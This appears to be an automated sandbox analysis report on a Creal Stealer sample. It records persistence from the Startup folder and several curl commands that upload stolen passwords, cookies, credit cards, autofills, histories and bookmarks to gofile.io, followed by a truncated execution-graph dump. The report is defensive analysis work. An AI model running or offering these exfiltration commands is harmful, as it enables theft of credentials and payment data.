                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:03:09:28
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
                                                                                                                                                                                                              Imagebase:0x7ff7c3ce0000
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5 hash:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1716089607.000002085E24E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1717159393.000002085E25C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1715402115.000002085F215000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1713151539.000002085E24C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1711307435.000002085F388000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000002.1748038824.000002085F38A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1723970775.000002085E860000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1703156457.000002085F1E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1712107588.000002085E22D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000002.1737494959.000002085E25D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1703944510.000002085E851000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1704228303.000002085F214000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1704032686.000002085F380000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1703552422.000002085F1E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000002.1748098900.000002085F860000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1703762541.000002085F1E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1707931768.000002085E22C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1706137097.000002085E212000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1707127966.000002085E212000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000002.1747339313.000002085F21D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1715680731.000002085E24E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: JoeSecurity_CrealStealer, Description: Yara detected Creal Stealer, Source: 0000001C.00000003.1703156457.000002085F085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:03:09:32
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                              Start time:03:09:32
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:03:09:32
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                              Imagebase:0x7ff7df590000
                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                              Start time:03:09:36
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:03:09:36
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                              Start time:03:09:36
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                              Start time:03:09:37
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                              Start time:03:09:37
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                              Start time:03:09:37
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                              Start time:03:09:39
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                              Start time:03:09:39
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                              Start time:03:09:39
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
                                                                                                                                                                                                              Imagebase:0x7ff778450000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                              Start time:03:09:42
                                                                                                                                                                                                              Start date:16/01/2025
                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
                                                                                                                                                                                                              Imagebase:0x7ff60d430000
                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:11.1%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:20.3%
                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                Total number of Limit Nodes:45
                                                                                                                                                                                                                execution_graph 19718 7ff67a621e20 19729 7ff67a627db4 19718->19729 19730 7ff67a627dc1 19729->19730 19731 7ff67a61b00c __free_lconv_num 11 API calls 19730->19731 19732 7ff67a627ddd 19730->19732 19731->19730 19733 7ff67a61b00c __free_lconv_num 11 API calls 19732->19733 19734 7ff67a621e29 19732->19734 19733->19732 19735 7ff67a620db8 EnterCriticalSection 19734->19735 18488 7ff67a62ac89 18489 7ff67a62ac98 18488->18489 18490 7ff67a62aca2 18488->18490 18492 7ff67a620e18 LeaveCriticalSection 18489->18492 18507 7ff67a60c090 18508 7ff67a60c0a0 18507->18508 18524 7ff67a61a238 18508->18524 18510 7ff67a60c0ac 18530 7ff67a60c398 18510->18530 18512 7ff67a60c67c 7 API calls 18514 7ff67a60c145 18512->18514 18513 7ff67a60c0c4 _RTC_Initialize 18522 7ff67a60c119 18513->18522 18535 7ff67a60c548 18513->18535 18516 7ff67a60c0d9 18538 7ff67a6196a4 18516->18538 18522->18512 18523 7ff67a60c135 18522->18523 18525 7ff67a61a249 18524->18525 18526 7ff67a61a251 18525->18526 18527 7ff67a6155c4 _findclose 11 API calls 18525->18527 18526->18510 18528 7ff67a61a260 18527->18528 18529 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18528->18529 18529->18526 18531 7ff67a60c3a9 18530->18531 18534 7ff67a60c3ae __scrt_acquire_startup_lock 18530->18534 18532 7ff67a60c67c 7 API calls 18531->18532 18531->18534 18533 7ff67a60c422 18532->18533 18534->18513 18563 7ff67a60c50c 18535->18563 18537 7ff67a60c551 18537->18516 18539 7ff67a6196c4 18538->18539 18545 7ff67a60c0e5 18538->18545 18540 7ff67a6196cc 18539->18540 18541 7ff67a6196e2 GetModuleFileNameW 18539->18541 18542 7ff67a6155c4 _findclose 11 API calls 18540->18542 18546 7ff67a61970d 18541->18546 18543 7ff67a6196d1 18542->18543 18544 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 18543->18544 18544->18545 18545->18522 18562 7ff67a60c61c InitializeSListHead 18545->18562 18578 7ff67a619644 18546->18578 18549 7ff67a619755 18550 7ff67a6155c4 _findclose 11 API calls 18549->18550 18551 7ff67a61975a 18550->18551 18552 7ff67a61b00c __free_lconv_num 11 API calls 18551->18552 18552->18545 18553 7ff67a61978f 18555 7ff67a61b00c __free_lconv_num 11 API calls 18553->18555 18554 7ff67a61976d 18554->18553 18556 7ff67a6197bb 18554->18556 18557 7ff67a6197d4 18554->18557 18555->18545 18558 7ff67a61b00c __free_lconv_num 11 API calls 18556->18558 18560 7ff67a61b00c __free_lconv_num 11 API calls 18557->18560 18559 7ff67a6197c4 18558->18559 18561 7ff67a61b00c __free_lconv_num 11 API calls 18559->18561 18560->18553 18561->18545 18564 7ff67a60c526 18563->18564 18566 7ff67a60c51f 18563->18566 18567 7ff67a61a87c 18564->18567 18566->18537 18570 7ff67a61a4b8 18567->18570 18577 7ff67a620db8 EnterCriticalSection 18570->18577 18579 7ff67a61965c 18578->18579 18583 7ff67a619694 18578->18583 18580 7ff67a61f258 _findclose 11 API calls 18579->18580 18579->18583 18581 7ff67a61968a 18580->18581 18582 7ff67a61b00c __free_lconv_num 11 API calls 18581->18582 18582->18583 18583->18549 18583->18554 19744 7ff67a615410 19745 7ff67a61541b 19744->19745 19753 7ff67a61f864 19745->19753 19766 7ff67a620db8 EnterCriticalSection 19753->19766 18584 7ff67a61b690 18585 7ff67a61b6aa 18584->18585 18586 7ff67a61b695 18584->18586 18590 7ff67a61b6b0 18586->18590 18591 7ff67a61b6fa 18590->18591 18592 7ff67a61b6f2 18590->18592 18594 7ff67a61b00c __free_lconv_num 11 API calls 18591->18594 18593 7ff67a61b00c __free_lconv_num 11 API calls 18592->18593 18593->18591 18595 7ff67a61b707 18594->18595 18596 7ff67a61b00c __free_lconv_num 11 API calls 18595->18596 18597 7ff67a61b714 18596->18597 18598 7ff67a61b00c __free_lconv_num 11 API calls 18597->18598 18599 7ff67a61b721 18598->18599 18600 7ff67a61b00c __free_lconv_num 11 API calls 18599->18600 18601 7ff67a61b72e 18600->18601 18602 7ff67a61b00c __free_lconv_num 11 API calls 18601->18602 18603 7ff67a61b73b 18602->18603 18604 7ff67a61b00c __free_lconv_num 11 API calls 18603->18604 18605 7ff67a61b748 18604->18605 18606 7ff67a61b00c __free_lconv_num 11 API calls 18605->18606 18607 7ff67a61b755 18606->18607 18608 7ff67a61b00c __free_lconv_num 11 API calls 18607->18608 18609 7ff67a61b765 18608->18609 18610 7ff67a61b00c __free_lconv_num 11 API calls 18609->18610 18611 7ff67a61b775 18610->18611 18616 7ff67a61b558 18611->18616 18630 7ff67a620db8 EnterCriticalSection 18616->18630 15213 7ff67a60c17c 15234 7ff67a60c34c 15213->15234 15216 7ff67a60c2c8 15334 7ff67a60c67c IsProcessorFeaturePresent 15216->15334 15217 7ff67a60c198 __scrt_acquire_startup_lock 15219 7ff67a60c2d2 15217->15219 15226 7ff67a60c1b6 __scrt_release_startup_lock 15217->15226 15220 7ff67a60c67c 7 API calls 15219->15220 15222 7ff67a60c2dd __FrameHandler3::FrameUnwindToEmptyState 15220->15222 15221 7ff67a60c1db 15223 7ff67a60c261 15240 7ff67a60c7c8 15223->15240 15225 7ff67a60c266 15243 7ff67a601000 15225->15243 15226->15221 15226->15223 15323 7ff67a61a1bc 15226->15323 15231 7ff67a60c289 15231->15222 15330 7ff67a60c4e0 15231->15330 15341 7ff67a60c94c 15234->15341 15237 7ff67a60c190 15237->15216 15237->15217 15238 7ff67a60c37b __scrt_initialize_crt 15238->15237 15343 7ff67a60da98 15238->15343 15370 7ff67a60d1e0 15240->15370 15242 7ff67a60c7df GetStartupInfoW 15242->15225 15244 7ff67a60100b 15243->15244 15372 7ff67a6087b0 15244->15372 15246 7ff67a60101d 15379 7ff67a615ff8 15246->15379 15248 7ff67a6039cb 15386 7ff67a601eb0 15248->15386 15254 7ff67a6039ea 15277 7ff67a603ad2 15254->15277 15402 7ff67a607b70 15254->15402 15256 7ff67a603a1f 15257 7ff67a607b70 61 API calls 15256->15257 15272 7ff67a603a6b 15256->15272 15263 7ff67a603a40 __vcrt_freefls 15257->15263 15259 7ff67a603a80 15421 7ff67a601cb0 15259->15421 15262 7ff67a603b4d 15285 7ff67a603bad 15262->15285 15440 7ff67a608980 15262->15440 15266 7ff67a608050 58 API calls 15263->15266 15263->15272 15264 7ff67a601cb0 121 API calls 15265 7ff67a603ab6 15264->15265 15267 7ff67a603aba 15265->15267 15268 7ff67a603ad7 15265->15268 15266->15272 15540 7ff67a602b30 15267->15540 15268->15262 15553 7ff67a603fe0 15268->15553 15269 7ff67a603bfb 15478 7ff67a606df0 15269->15478 15417 7ff67a608050 15272->15417 15274 7ff67a603be0 15279 7ff67a603b73 15274->15279 15280 7ff67a603bee SetDllDirectoryW 15274->15280 15576 7ff67a60bdc0 15277->15576 15287 7ff67a602b30 59 API calls 15279->15287 15280->15269 15285->15269 15285->15277 15464 7ff67a608be0 15285->15464 15286 7ff67a603af5 15291 7ff67a602b30 59 API calls 15286->15291 15287->15277 15288 7ff67a603c15 15314 7ff67a603c47 15288->15314 15594 7ff67a606600 15288->15594 15290 7ff67a603d06 15482 